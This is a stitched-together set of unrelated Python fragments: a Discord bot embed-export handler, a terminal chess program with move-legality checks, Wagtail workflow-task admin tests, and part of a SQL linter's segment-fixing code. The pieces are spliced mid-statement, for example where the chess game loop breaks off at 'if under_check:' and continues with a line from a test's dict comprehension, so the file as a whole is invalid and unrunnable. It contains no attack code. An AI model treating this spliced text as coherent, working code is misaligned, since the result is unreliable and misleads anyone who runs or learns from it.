            msg = await self.bot.get_message(channel, str(message_id))
            if msg.author.id != self.bot.user.id:
                await ctx.send("Invalid User's Message.")
                return
            elif not msg.embeds:
                await ctx.send("No embeds in The Message.")
                return
            # NOTE(review): `msg` is a Message here, but from_embed expects
            # an Embed or EmbedData — `msg.embeds[0]` looks intended; verify.
            embed_parser = JsonEmbedParser.from_embed(ctx, msg)
            json = embed_parser.make_json()
            await ctx.send(f"```json\n{json}```")

    # endregion
    # region: showing, sending, resetting

    async def send_embed(self, author: Member, channel: TextChannel) -> bool:
        """Send the Embed."""
        try:
            await channel.send(self.embeds[author].content, embed=self.embeds[author].embed)
#!/usr/bin/env python
"""
TUI based Python Chess Program
"""
from __future__ import print_function
import os

CLEAR='clear'
# CLEAR='cls' # For Windows

# Board: 8x8 grid of 2-character cells. Uppercase letters are one side's
# pieces, lowercase the other's; '  ' (two spaces) is an empty square and
# '* ' marks an empty square highlighted as a possible move.
ch = [['  '] * 8 for i in range(8)]


def init():
    # Place the starting position: uppercase back rank on row 0,
    # uppercase pawns on row 1; lowercase mirrored on rows 7 and 6.
    ch[0][0] = 'R '
    ch[0][1] = 'N '
    ch[0][2] = 'B '
    ch[0][3] = 'Q '
    ch[0][4] = 'K '
    ch[0][5] = 'B '
    ch[0][6] = 'N '
    ch[0][7] = 'R '
    for i in range(8):
        ch[1][i] = 'P '
    ch[7][0] = 'r '
    ch[7][1] = 'n '
    ch[7][2] = 'b '
    ch[7][3] = 'q '
    ch[7][4] = 'k '
    ch[7][5] = 'b '
    ch[7][6] = 'n '
    ch[7][7] = 'r '
    for i in range(8):
        ch[6][i] = 'p '


init()

"""An important note must be made that 'P '.isupper() and 'p '.islower(),
both would give True. Whereas, '  ', '* ' would give False for both
islower() and isupper() methods."""


def disp(turn_to_play):
    # Clear the terminal and draw the board oriented towards the side
    # whose turn it is ('w' shows rank 8 at the top, 'b' the mirror view).
    os.system(CLEAR)
    print(" +" + "-----+" * 8)
    if turn_to_play == 'w':
        for i in range(7, -1, -1):
            print(i + 1, "| ", str(ch[i]).lstrip("['").rstrip("]'").replace("', '", " | "), "|")
            print(" |" + " |" * 8)
            print(" +" + "-----+" * 8)
        print(" a b c d e f g h")
    elif turn_to_play == 'b':
        for i in range(8):
            # Reverse each rank so files read h..a from black's side.
            print(i + 1, "| ", str(ch[i][-1::-1]).lstrip("['").rstrip("]'").replace("', '", " | "), "|")
            print(" |" + " |" * 8)
            print(" +" + "-----+" * 8)
        print(" h g f e d c b a")


def c(x, y):
    """Returns 1 if x < y and -1 if x > y."""
    # Step direction for ray scans. Division by abs(y - x) means x == y
    # would raise ZeroDivisionError; callers only use it when x != y.
    return (y - x) // abs(y - x)


def move(ini, fin):
    # Move the piece at ini onto fin, leaving ini empty.
    ch[fin[0]][fin[1]] = ch[ini[0]][ini[1]]
    ch[ini[0]][ini[1]] = '  '


def add_stars(positions):
    # Highlight candidate squares: keep the piece letter, prefix '*'.
    for pos in positions:
        ch[pos[0]][pos[1]] = '*' + ch[pos[0]][pos[1]][0]


def remove_stars(positions):
    # Undo add_stars: drop the '*' prefix and restore the trailing space.
    for pos in positions:
        ch[pos[0]][pos[1]] = ch[pos[0]][pos[1]][1] + " "


def empty(piece):
    """To check if given piece is empty
    Necessary because an empty position can be both '  ' or '* '
    """
    if piece == '  ' or piece == '* ':
        return True
    return False


def on_attack(ini, fin):
    """To check if position at fin is under attack by piece by ini.
    If fin is under attack does not mean that the piece (under attack/movable)
    at ini can move over to fin since doing that can put a check on it's own king.
    This is checked in the legal(ini, fin) function."""
    global ep_pos
    i_piece = ch[ini[0]][ini[1]]  # Piece at ini
    f_piece = ch[fin[0]][fin[1]]  # Piece at fin
    # Try to get the en-passant activated pawn if there is no IndexError given by default position (9, 9).
    try:
        ep_pawn = ch[ep_pos[0]][ep_pos[1]]
    except IndexError:
        ep_pawn = " "
    # Initial and Final Positions should not be same
    if ini == fin:
        return False
    # Condition that a piece cannot attack it's own team member
    if (i_piece.isupper() and f_piece.isupper()) or (i_piece.islower() and f_piece.islower()):
        return False
    # Condition for Pawns
    # Four clauses: single push, diagonal capture, en-passant capture,
    # and the initial double push (which also requires the jumped square empty).
    if i_piece == 'P ':
        if (fin[0] == ini[0] + 1 and fin[1] == ini[1] and empty(f_piece)) or (
                fin[0] == ini[0] + 1 and abs(fin[1] - ini[1]) == 1 and not empty(f_piece)) or (
                abs(ini[1] - ep_pos[1]) == 1 and ini[0] == ep_pos[0] and fin[0] == ini[0] + 1
                and fin[1] == ep_pos[1] and ep_pawn.islower()) or (
                ini[0] == 1 and fin[0] == 3 and ini[1] == fin[1] and empty(ch[2][ini[1]]) and empty(f_piece)):
            return True
        else:
            return False
    elif i_piece == 'p ':
        if (fin[0] == ini[0] - 1 and fin[1] == ini[1] and empty(f_piece)) or (
                fin[0] == ini[0] - 1 and abs(fin[1] - ini[1]) == 1 and not empty(f_piece)) or (
                abs(ini[1] - ep_pos[1]) == 1 and ini[0] == ep_pos[0] and fin[0] == ini[0] - 1
                and fin[1] == ep_pos[1] and ep_pawn.isupper()) or (
                ini[0] == 6 and fin[0] == 4 and ini[1] == fin[1] and empty(ch[5][ini[1]]) and empty(f_piece)):
            return True
        else:
            return False
    # Condition for Rooks
    # Same rank or same file, with every square strictly between empty.
    elif i_piece == 'r ' or i_piece == 'R ':
        if ini[0] == fin[0]:
            for i in range(ini[1] + c(ini[1], fin[1]), fin[1], c(ini[1], fin[1])):
                if not empty(ch[ini[0]][i]):
                    return False
            return True
        elif ini[1] == fin[1]:
            for i in range(ini[0] + c(ini[0], fin[0]), fin[0], c(ini[0], fin[0])):
                if not empty(ch[i][ini[1]]):
                    return False
            return True
        else:
            return False
    # Condition for Bishops
    # Diagonal move with an empty path between ini and fin.
    elif i_piece == 'b ' or i_piece == 'B ':
        if abs(fin[0] - ini[0]) == abs(fin[1] - ini[1]):
            i_increment = c(ini[0], fin[0])
            j_increment = c(ini[1], fin[1])
            i = ini[0] + i_increment
            j = ini[1] + j_increment
            while i != fin[0]:
                if not empty(ch[i][j]):
                    return False
                i += i_increment
                j += j_increment
            return True
        else:
            return False
    # Conditions for Queens
    # Either one of Rook or Bishop Conditions should be satisfied
    # (the queen is temporarily rewritten on the board to reuse the
    # rook/bishop branches recursively, then restored).
    elif i_piece == 'q ' or i_piece == 'Q ':
        # Condition for Rook
        ch[ini[0]][ini[1]] = 'r ' if i_piece == 'q ' else 'R '
        legal1 = on_attack(ini, fin)
        # Condition for Bishop
        ch[ini[0]][ini[1]] = 'b ' if ch[ini[0]][ini[1]] == 'r ' else 'B '
        legal2 = on_attack(ini, fin)
        # Convert the piece back to normal
        ch[ini[0]][ini[1]] = 'q ' if ch[ini[0]][ini[1]] == 'b ' else 'Q '
        return legal1 or legal2
    # Condition for Knights
    elif i_piece == 'n ' or i_piece == 'N ':
        if (abs(fin[0] - ini[0]) == 2 and abs(fin[1] - ini[1]) == 1) or (
                abs(fin[0] - ini[0]) == 1 and abs(fin[1] - ini[1]) == 2):
            return True
        else:
            return False
    # Condition for Kings
    elif i_piece == 'k ' or i_piece == 'K ':
        if abs(fin[1] - ini[1]) <= 1 and abs(fin[0] - ini[0]) <= 1:
            return True
        else:
            return False


def is_forbid_king(k_piece):
    """Given the king, the function returns if that king is under check or not"""
    # Find the king's square, then test every enemy piece for an attack on it.
    for i in range(8):
        for j in range(8):
            if ch[i][j] == k_piece:
                pos_king = i, j
                break
    for i in range(8):
        for j in range(8):
            if ch[i][j].isupper() and k_piece.islower() or ch[i][j].islower() and k_piece.isupper():
                if on_attack((i, j), pos_king):
                    return True
    return False


def legal(ini, fin):
    """If position at fin is under attack by piece at ini, this function checks
    whether moving the piece at ini to fin is legal or not.
    It might not be legal because moving there would put it's own king under check."""
    """To check that, we move the piece at ini to fin without displaying and check
    whether that configuration puts the piece's king under check."""
    if not on_attack(ini, fin):
        return False
    # Tentatively make the move, test for self-check, then restore the
    # board exactly (including the captured piece, if any).
    piece_at_fin = ch[fin[0]][fin[1]]
    move(ini, fin)
    if ch[fin[0]][fin[1]].islower() and is_forbid_king('k '):
        move(fin, ini)
        ch[fin[0]][fin[1]] = piece_at_fin
        return False
    if ch[fin[0]][fin[1]].isupper() and is_forbid_king('K '):
        move(fin, ini)
        ch[fin[0]][fin[1]] = piece_at_fin
        return False
    move(fin, ini)
    ch[fin[0]][fin[1]] = piece_at_fin
    return True


def possible_moves(ini):
    """Gives all the legal movable positions of the piece at ini."""
    possible_mov = []
    for i in range(8):
        for j in range(8):
            if legal(ini, (i, j)):
                possible_mov.append((i, j))
    return possible_mov


def input_valid(inp):
    # A valid square is a file letter a-h followed by a rank digit 1-8.
    if len(inp) != 2 or (inp[0] not in ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h']) or (
            inp[1] not in ['1', '2', '3', '4', '5', '6', '7', '8']):
        return False
    return True


def under_check_func():
    """To check whether a check was put under check in the previous turn."""
    global turn
    if is_forbid_king('k ') and turn == 'b':
        return True
    elif is_forbid_king('K ') and turn == 'w':
        return True
    return False


def legalmov_left_func():
    """To check if any legal move is left for the current turn."""
    global turn
    if turn == 'b':
        for i in range(8):
            for j in range(8):
                if ch[i][j].islower() and possible_moves((i, j)) != []:
                    return True
    elif turn == 'w':
        for i in range(8):
            for j in range(8):
                if ch[i][j].isupper() and possible_moves((i, j)) != []:
                    return True
    return False


# Game state: 'w' moves first; ep_pos tracks the en-passant target pawn.
turn = 'w'
ep_pos = (9, 9)
"""ep_pos will give the position of en-passant activated pawn. (9, 9) index
means no pawn is activated. ch[9][9] would give IndexError but it is not at
distance 1 from any column on chess board which is what we have used in the
on_attack() function."""

# Main game loop: redraw, then detect stalemate/check before reading a move.
while True:
    disp(turn)
    under_check = under_check_func()
    legalmov_left = legalmov_left_func()
    if not legalmov_left and not under_check:
        print("\nStalemate. Draw.")
        input()
        break
    if under_check:
            value in context.items()
        }
        self.assertEqual(
            full_context["message"],
            "Sorry, you do not have permission to access this area.",
        )
        self.login(user=self.moderator)
        response = self.get()
        self.assertEqual(response.status_code, 200)


class TestCreateTaskView(TestCase, WagtailTestUtils):
    """Tests for the workflow task creation admin view."""

    def setUp(self):
        delete_existing_workflows()
        self.login()
        # An editor WITHOUT the add_task permission...
        self.editor = self.create_user(
            username="editor",
            email="<EMAIL>",
            password="password",
        )
        editors = Group.objects.get(name="Editors")
        editors.user_set.add(self.editor)
        # ...and a moderator WITH it, to exercise both permission paths.
        self.moderator = self.create_user(
            username="moderator",
            email="<EMAIL>",
            password="password",
        )
        moderators = Group.objects.get(name="Moderators")
        moderators.user_set.add(self.moderator)
        moderators.permissions.add(Permission.objects.get(codename="add_task"))

    # NOTE(review): mutable default `params={}` is shared across calls;
    # harmless here since it is never mutated, but worth confirming.
    def get(self, url_kwargs=None, params={}):
        # Default to the SimpleTask content type unless overridden.
        url_kwargs = url_kwargs or {}
        url_kwargs.setdefault("app_label", SimpleTask._meta.app_label)
        url_kwargs.setdefault("model_name", SimpleTask._meta.model_name)
        return self.client.get(
            reverse("wagtailadmin_workflows:add_task", kwargs=url_kwargs), params
        )

    def post(self, post_data={}):
        return self.client.post(
            reverse(
                "wagtailadmin_workflows:add_task",
                kwargs={
                    "app_label": SimpleTask._meta.app_label,
                    "model_name": SimpleTask._meta.model_name,
                },
            ),
            post_data,
        )

    def test_get(self):
        response = self.get()
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, "wagtailadmin/workflows/create_task.html")

    def test_get_with_non_task_model(self):
        # A model that is not a Task subclass must 404.
        response = self.get(
            url_kwargs={"app_label": "wagtailcore", "model_name": "Site"}
        )
        self.assertEqual(response.status_code, 404)

    def test_get_with_base_task_model(self):
        # The abstract-ish base Task model itself must 404 too.
        response = self.get(
            url_kwargs={"app_label": "wagtailcore", "model_name": "Task"}
        )
        self.assertEqual(response.status_code, 404)

    def test_post(self):
        response = self.post({"name": "test_task", "active": "on"})
        # Should redirect back to index
        self.assertRedirects(response, reverse("wagtailadmin_workflows:task_index"))
        # Check that the task was created
        tasks = Task.objects.filter(name="test_task", active=True)
        self.assertEqual(tasks.count(), 1)

    def test_permissions(self):
        # Editors without add_task get redirected with a permission message.
        self.login(user=self.editor)
        response = self.get()
        self.assertEqual(response.status_code, 302)
        full_context = {
            key: value for context in response.context for key, value in context.items()
        }
        self.assertEqual(
            full_context["message"],
            "Sorry, you do not have permission to access this area.",
        )
        # Moderators with add_task can reach the view.
        self.login(user=self.moderator)
        response = self.get()
        self.assertEqual(response.status_code, 200)


class TestSelectTaskTypeView(TestCase, WagtailTestUtils):
    """Tests for the task-type chooser view."""

    def setUp(self):
        delete_existing_workflows()
        self.login()

    def get(self):
        return self.client.get(reverse("wagtailadmin_workflows:select_task_type"))

    def test_get(self):
        response = self.get()
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(
            response, "wagtailadmin/workflows/select_task_type.html"
        )
        # Check that the list of available task types includes SimpleTask and GroupApprovalTask
        self.assertContains(response, SimpleTask.get_verbose_name())
        self.assertContains(response, GroupApprovalTask.get_verbose_name())
        self.assertContains(response, GroupApprovalTask.get_description())


class TestEditTaskView(TestCase, WagtailTestUtils):
    """Tests for the workflow task edit admin view."""

    def setUp(self):
        delete_existing_workflows()
        self.login()
        self.task = GroupApprovalTask.objects.create(name="test_task")
        self.editor = self.create_user(
            username="editor",
            email="<EMAIL>",
            password="password",
        )
        editors = Group.objects.get(name="Editors")
        editors.user_set.add(self.editor)
        self.moderator = self.create_user(
            username="moderator",
            email="<EMAIL>",
            password="password",
        )
        moderators = Group.objects.get(name="Moderators")
        moderators.user_set.add(self.moderator)
        moderators.permissions.add(Permission.objects.get(codename="change_task"))

    def get(self, params={}):
        return self.client.get(
            reverse("wagtailadmin_workflows:edit_task", args=[self.task.id]), params
        )

    def post(self, post_data={}):
        return self.client.post(
            reverse("wagtailadmin_workflows:edit_task", args=[self.task.id]), post_data
        )

    def test_get(self):
        response = self.get()
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, "wagtailadmin/workflows/edit_task.html")

    def test_post(self):
        self.assertEqual(self.task.groups.count(), 0)
        editors = Group.objects.get(name="Editors")
        response = self.post(
            {"name": "test_task_modified", "active": "on", "groups": [str(editors.id)]}
        )
        # Should redirect back to index
        self.assertRedirects(response, reverse("wagtailadmin_workflows:task_index"))
        # Check that the task was updated
        task = GroupApprovalTask.objects.get(id=self.task.id)
        # The task name cannot be changed
        self.assertEqual(task.name, "test_task")
        # This request should've added a group to the task
        self.assertEqual(task.groups.count(), 1)
        self.assertTrue(task.groups.filter(id=editors.id).exists())

    def test_permissions(self):
        self.login(user=self.editor)
        response = self.get()
        self.assertEqual(response.status_code, 302)
        full_context = {
            key: value for context in response.context for key, value in context.items()
        }
        self.assertEqual(
            full_context["message"],
            "Sorry, you do not have permission to access this area.",
        )
        self.login(user=self.moderator)
        response = self.get()
        self.assertEqual(response.status_code, 200)

    def test_admin_url_finder(self):
        # Edit URLs are only resolvable for users allowed to edit tasks.
        editor_url_finder = AdminURLFinder(self.editor)
        self.assertIsNone(editor_url_finder.get_edit_url(self.task))
        moderator_url_finder = AdminURLFinder(self.moderator)
        expected_url = "/admin/workflows/tasks/edit/%d/" % self.task.pk
        self.assertEqual(moderator_url_finder.get_edit_url(self.task), expected_url)


class TestSubmitToWorkflow(TestCase, WagtailTestUtils):
    """Tests for submitting a page to a two-task moderation workflow."""

    def setUp(self):
        delete_existing_workflows()
        # The submitter is only an editor; moderators approve the tasks.
        self.submitter = self.create_user(
            username="submitter",
            email="<EMAIL>",
            password="password",
        )
        editors = Group.objects.get(name="Editors")
        editors.user_set.add(self.submitter)
        self.moderator = self.create_user(
            username="moderator",
            email="<EMAIL>",
            password="password",
        )
        moderators = Group.objects.get(name="Moderators")
        moderators.user_set.add(self.moderator)
        self.superuser = self.create_superuser(
            username="superuser",
            email="<EMAIL>",
            password="password",
        )
        self.login(user=self.submitter)
        # Create a page
        root_page = Page.objects.get(id=2)
        self.page = SimplePage(
            title="Hello world!",
            slug="hello-world",
            content="hello",
            live=False,
            has_unpublished_changes=True,
        )
        root_page.add_child(instance=self.page)
        self.page.save_revision()
        self.workflow, self.task_1, self.task_2 = self.create_workflow_and_tasks()
        WorkflowPage.objects.create(workflow=self.workflow, page=self.page)

    def create_workflow_and_tasks(self):
        # Two sequential moderator-approval tasks on one workflow.
        workflow = Workflow.objects.create(name="test_workflow")
        task_1 = GroupApprovalTask.objects.create(name="test_task_1")
        task_2 = GroupApprovalTask.objects.create(name="test_task_2")
        task_1.groups.set(Group.objects.filter(name="Moderators"))
        task_2.groups.set(Group.objects.filter(name="Moderators"))
        WorkflowTask.objects.create(workflow=workflow, task=task_1, sort_order=1)
        WorkflowTask.objects.create(workflow=workflow, task=task_2, sort_order=2)
        return workflow, task_1, task_2

    def submit(self):
        # Posting the edit form with action-submit sends the page into
        # its workflow.
        post_data = {
            "title": str(self.page.title),
            "slug": str(self.page.slug),
            "content": str(self.page.content),
            "action-submit": "True",
        }
        return self.client.post(
            reverse("wagtailadmin_pages:edit", args=(self.page.id,)), post_data
        )

    def test_submit_for_approval_creates_states(self):
        """Test that WorkflowState and TaskState objects are correctly created when a Page is submitted for approval"""
        self.submit()
        workflow_state = self.page.current_workflow_state
        self.assertEqual(type(workflow_state), WorkflowState)
        self.assertEqual(workflow_state.workflow, self.workflow)
        self.assertEqual(workflow_state.status, workflow_state.STATUS_IN_PROGRESS)
        self.assertEqual(workflow_state.requested_by, self.submitter)
        task_state = workflow_state.current_task_state
        self.assertEqual(type(task_state), TaskState)
self.assertEqual(task_state.task.specific, self.task_1) self.assertEqual(task_state.status, task_state.STATUS_IN_PROGRESS) def test_submit_for_approval_changes_status_in_status_side_panel_meta(self): edit_url = reverse("wagtailadmin_pages:edit", args=(self.page.id,)) response = self.client.get(edit_url) self.assertContains(response, "Draft", count=1) # submit for approval self.submit() response = self.client.get(edit_url) self.assertRegex( response.content.decode("utf-8"), r"Sent to[\s|\n]+{}".format(self.page.current_workflow_task.name), ) self.assertNotContains(response, "Draft") def test_submit_sends_mail(self): self.submit() # 3 emails sent: # - to moderator - submitted for approval in moderation stage test_task_1 # - to superuser - submitted for approval in moderation stage test_task_1 # - to superuser - submitted to workflow test_workflow self.assertEqual(len(mail.outbox), 3) # the 'submitted to workflow' email should include the submitter's name workflow_message = None for msg in mail.outbox: if ( msg.subject == 'The page "Hello world! (simple page)" has been submitted to workflow "test_workflow"' ): workflow_message = msg break self.assertTrue(workflow_message) self.assertIn( 'The page "Hello world! 
(simple page)" has been submitted for moderation to workflow "test_workflow" by submitter', workflow_message.body, ) @mock.patch.object( EmailMultiAlternatives, "send", side_effect=IOError("Server down") ) def test_email_send_error(self, mock_fn): logging.disable(logging.CRITICAL) response = self.submit() logging.disable(logging.NOTSET) # An email that fails to send should return a message rather than crash the page self.assertEqual(response.status_code, 302) response = self.client.get(reverse("wagtailadmin_home")) def test_resume_rejected_workflow(self): # test that an existing workflow can be resumed by submitting when rejected self.workflow.start(self.page, user=self.submitter) workflow_state = self.page.current_workflow_state workflow_state.current_task_state.approve(user=self.superuser) workflow_state.refresh_from_db() workflow_state.current_task_state.reject(user=self.superuser) workflow_state.refresh_from_db() self.assertEqual(workflow_state.current_task_state.task.specific, self.task_2) self.assertEqual(workflow_state.status, WorkflowState.STATUS_NEEDS_CHANGES) self.submit() workflow_state.refresh_from_db() # check that the same workflow state's status is now in progress self.assertEqual(workflow_state.status, WorkflowState.STATUS_IN_PROGRESS) # check that the workflow remains on the rejecting task, rather than resetting self.assertEqual(workflow_state.current_task_state.task.specific, self.task_2) def test_restart_rejected_workflow(self): # test that an existing workflow can be restarted when rejected self.workflow.start(self.page, user=self.submitter) workflow_state = self.page.current_workflow_state workflow_state.current_task_state.approve(user=self.superuser) workflow_state.refresh_from_db() workflow_state.current_task_state.reject(user=self.superuser) workflow_state.refresh_from_db() self.assertEqual(workflow_state.current_task_state.task.specific, self.task_2) self.assertEqual(workflow_state.status, WorkflowState.STATUS_NEEDS_CHANGES) post_data = { 
"title": str(self.page.title), "slug": str(self.page.slug), "content": str(self.page.content), "action-restart-workflow": "True", } self.client.post( reverse("wagtailadmin_pages:edit", args=(self.page.id,)), post_data ) workflow_state.refresh_from_db() # check that the same workflow state's status is now cancelled self.assertEqual(workflow_state.status, WorkflowState.STATUS_CANCELLED) # check that the new workflow has started on the first task new_workflow_state = self.page.current_workflow_state self.assertEqual(new_workflow_state.status, WorkflowState.STATUS_IN_PROGRESS) self.assertEqual( new_workflow_state.current_task_state.task.specific, self.task_1 ) def test_cancel_workflow(self): # test that an existing workflow can be cancelled after submission by the submitter self.workflow.start(self.page, user=self.submitter) workflow_state = self.page.current_workflow_state self.assertEqual(workflow_state.current_task_state.task.specific, self.task_1) self.assertEqual(workflow_state.status, WorkflowState.STATUS_IN_PROGRESS) post_data = { "title": str(self.page.title), "slug": str(self.page.slug), "content": str(self.page.content), "action-cancel-workflow": "True", } self.client.post( reverse("wagtailadmin_pages:edit", args=(self.page.id,)), post_data ) workflow_state.refresh_from_db() # check that the workflow state's status is now cancelled self.assertEqual(workflow_state.status, WorkflowState.STATUS_CANCELLED) self.assertEqual( workflow_state.current_task_state.status, TaskState.STATUS_CANCELLED ) def test_email_headers(self): # Submit self.submit() msg_headers = set(mail.outbox[0].message().items()) headers = {("Auto-Submitted", "auto-generated")} self.assertTrue( headers.issubset(msg_headers), msg="Message is missing the Auto-Submitted header.", ) @freeze_time("2020-03-31 12:00:00") class TestApproveRejectWorkflow(TestCase, WagtailTestUtils): def setUp(self): delete_existing_workflows() self.submitter = self.create_user( username="submitter", 
first_name="Sebastian", last_name="Mitter", email="<EMAIL>", password="password", ) editors = Group.objects.get(name="Editors") editors.user_set.add(self.submitter) self.moderator = self.create_user( username="moderator", email="<EMAIL>", password="password", ) moderators = Group.objects.get(name="Moderators") moderators.user_set.add(self.moderator) self.superuser = self.create_superuser( username="superuser", email="<EMAIL>", password="password", ) self.login(user=self.submitter) # Create a page root_page = Page.objects.get(id=2) self.page = SimplePage( title="Hello world!", slug="hello-world", content="hello", live=False, has_unpublished_changes=True, ) root_page.add_child(instance=self.page) self.workflow, self.task_1 = self.create_workflow_and_tasks() WorkflowPage.objects.create(workflow=self.workflow, page=self.page) self.submit() self.login(user=self.moderator) def create_workflow_and_tasks(self): workflow = Workflow.objects.create(name="test_workflow") task_1 = GroupApprovalTask.objects.create(name="test_task_1") task_1.groups.set(Group.objects.filter(name="Moderators")) WorkflowTask.objects.create(workflow=workflow, task=task_1, sort_order=1) return workflow, task_1 def submit(self): post_data = { "title": str(self.page.title), "slug": str(self.page.slug), "content": str(self.page.content), "action-submit": "True", } return self.client.post( reverse("wagtailadmin_pages:edit", args=(self.page.id,)), post_data ) @override_settings(WAGTAIL_FINISH_WORKFLOW_ACTION="") def test_approve_task_and_workflow(self): """ This posts to the approve task view and checks that the page was approved and published """ # Unset WAGTAIL_FINISH_WORKFLOW_ACTION - default action should be to publish del settings.WAGTAIL_FINISH_WORKFLOW_ACTION # Connect a mock signal handler to page_published signal mock_handler = mock.MagicMock() page_published.connect(mock_handler) # Post self.client.post( reverse( "wagtailadmin_pages:workflow_action", args=( self.page.id, "approve", 
self.page.current_workflow_task_state.id, ), ), {"comment": "my comment"}, ) # Check that the workflow was approved workflow_state = WorkflowState.objects.get( page=self.page, requested_by=self.submitter ) self.assertEqual(workflow_state.status, workflow_state.STATUS_APPROVED) # Check that the task was approved task_state = workflow_state.current_task_state self.assertEqual(task_state.status, task_state.STATUS_APPROVED) # Check that the comment was added to the task state correctly self.assertEqual(task_state.comment, "my comment") page = Page.objects.get(id=self.page.id) # Page must be live self.assertTrue(page.live, "Approving moderation failed to set live=True") # Page should now have no unpublished changes self.assertFalse( page.has_unpublished_changes, "Approving moderation failed to set has_unpublished_changes=False", ) # Check that the page_published signal was fired self.assertEqual(mock_handler.call_count, 1) mock_call = mock_handler.mock_calls[0][2] self.assertEqual(mock_call["sender"], self.page.specific_class) self.assertEqual(mock_call["instance"], self.page) self.assertIsInstance(mock_call["instance"], self.page.specific_class) def test_workflow_dashboard_panel(self): response = self.client.get(reverse("wagtailadmin_home")) self.assertContains(response, "Awaiting your review") # check that ActivateWorkflowActionsForDashboard is present and passes a valid csrf token self.assertRegex( response.content.decode("utf-8"), r"ActivateWorkflowActionsForDashboard\(\'\w+\'\)", ) def test_workflow_action_get(self): """ This tests that a GET request to the workflow action view (for the approve action) returns a modal with a form for extra data entry: adding a comment """ response = self.client.get( reverse( "wagtailadmin_pages:workflow_action", args=( self.page.id, "approve", self.page.current_workflow_task_state.id, ), ) ) self.assertEqual(response.status_code, 200) self.assertTemplateUsed( response, "wagtailadmin/pages/workflow_action_modal.html" ) html = 
json.loads(response.content)["html"] self.assertTagInHTML( '<form action="' + reverse( "wagtailadmin_pages:workflow_action", args=( self.page.id, "approve", self.page.current_workflow_task_state.id, ), ) + '" method="POST" novalidate>', html, ) self.assertIn("Comment", html) def
Depth {0}. Expanding: {1}: {2!r}".format( parse_context.parse_depth, stmt.__class__.__name__, curtail_string(stmt.raw, length=40)) verbosity_logger(frame_msg(parse_depth_msg), verbosity=parse_context.verbosity) res = stmt.parse(parse_context=parse_context) if isinstance(res, BaseSegment): segs += (res,) else: # We might get back an iterable of segments segs += tuple(res) # Basic Validation check_still_complete(segments, segs, ()) return segs def raw_list(self): """Return a list of raw elements, mostly for testing or searching.""" buff = [] for s in self.segments: buff += s.raw_list() return buff def iter_raw_seg(self): """Iterate raw segments, mostly for searching.""" for s in self.segments: for seg in s.iter_raw_seg(): yield seg def iter_unparsables(self): """Iterate through any unparsables this segment may contain.""" for s in self.segments: for u in s.iter_unparsables(): yield u def type_set(self): """Return a set of the types contained, mostly for testing.""" typs = {self.type} for s in self.segments: typs |= s.type_set() return typs def __eq__(self, other): # Equal if type, content and pos are the same # NB: this should also work for RawSegment return (type(self) is type(other) and (self.raw == other.raw) and (self.pos_marker == other.pos_marker)) def __len__(self): """Implement a len method to make everyone's lives easier.""" return 1 def is_raw(self): """Return True if this segment has no children.""" return len(self.segments) == 0 @classmethod def expected_string(cls, dialect=None, called_from=None): """Return the expected string for this segment. This is never going to be called on an _instance_ but rather on the class, as part of a grammar, and therefore as part of the matching phase. So we use the match grammar. """ return cls._match_grammar().expected_string(dialect=dialect, called_from=called_from) @classmethod def as_optional(cls): """Construct a copy of this class, but with the optional flag set true. 
        Used in constructing grammars, will make an identical class
        but with the optional argument set to true. Used in constructing sequences.
        """
        # Now lets make the classname (it indicates the mother class for clarity)
        classname = "Optional_{0}".format(cls.__name__)
        # This is the magic, we generate a new class! SORCERY
        newclass = type(classname, (cls, ), dict(optional=True))
        # Now we return that class in the abstract. NOT INSTANTIATED
        return newclass

    def apply_fixes(self, fixes):
        """Apply an iterable of fixes to this segment.

        Used in applying fixes if we're fixing linting errors.
        If anything changes, this should return a new version of the segment
        rather than mutating the original.

        Note: We need to have fixes to apply AND this must have children. In the case
        of raw segments, they will be replaced or removed by their parent and
        so this function should just return self.

        Returns:
            (new_segment, remaining_fixes) — the possibly-rebuilt segment and any
            fixes that were not consumed at this level.
        """
        # Let's check what we've been given. Accept a list of SQLLintError as a
        # convenience and flatten it to the fixes those errors carry.
        if fixes and isinstance(fixes[0], SQLLintError):
            logging.error("Transforming `fixes` from errors into a list of fixes")
            # We've got linting errors, let's aggregate them into a list of fixes
            buff = []
            for err in fixes:
                buff += err.fixes
            # Overwrite fixes
            fixes = buff

        if fixes and not self.is_raw():
            # Get a reference to self to start with, but this will rapidly
            # become a working copy.
            r = self

            # Make a working copy
            seg_buffer = []
            todo_buffer = list(self.segments)
            while True:
                if len(todo_buffer) == 0:
                    break
                else:
                    seg = todo_buffer.pop(0)

                    # We don't apply fixes to meta segments
                    if seg.is_meta:
                        seg_buffer.append(seg)
                        continue

                    fix_buff = fixes.copy()
                    unused_fixes = []
                    while fix_buff:
                        f = fix_buff.pop()
                        if f.anchor == seg:
                            if f.edit_type == 'delete':
                                # We're just getting rid of this segment.
                                # seg stays None and — because `break` below skips
                                # the while-else — is never appended.
                                seg = None
                            elif f.edit_type in ('edit', 'create'):
                                # We're doing a replacement (it could be a single
                                # segment or an iterable)
                                if isinstance(f.edit, BaseSegment):
                                    seg_buffer.append(f.edit)
                                else:
                                    for s in f.edit:
                                        seg_buffer.append(s)

                                if f.edit_type == 'create':
                                    # in the case of a creation, also add this
                                    # segment on the end
                                    seg_buffer.append(seg)
                            else:
                                raise ValueError(
                                    "Unexpected edit_type: {0!r} in {1!r}".format(
                                        f.edit_type, f))
                            # We've applied a fix here. Move on, this also consumes
                            # the fix (it was popped and not re-added).
                            # TODO: Maybe deal with overlapping fixes later.
                            break
                        else:
                            # We've not used the fix so we should keep it in the
                            # list for later.
                            unused_fixes.append(f)
                    else:
                        # while-else: no fix anchored on this segment — keep it as-is.
                        seg_buffer.append(seg)
                # Switch over to the unused list
                fixes = unused_fixes + fix_buff
            # Then recurse (i.e. deal with the children) (Requeueing)
            seg_queue = seg_buffer
            seg_buffer = []
            for seg in seg_queue:
                s, fixes = seg.apply_fixes(fixes)
                seg_buffer.append(s)

            # Reform into a new segment
            r = r.__class__(
                segments=tuple(seg_buffer),
                pos_marker=r.pos_marker,
                validate=False
            )

            # Lastly, before returning, we should realign positions.
            # Note: Realign also returns a copy
            return r.realign(), fixes
        else:
            return self, fixes

    def realign(self):
        """Realign the positions in this segment.

        Returns:
            a copy of this class with the pos_markers realigned.

        Note: this is used mostly during fixes.

        Realign is recursive. We will assume that the pos_marker of THIS segment
        is truthful, and that during recursion it will have been set by the parent.
        This function will align the pos marker if it's direct children, we then
        recurse to realign their children.
        """
        seg_buffer = []
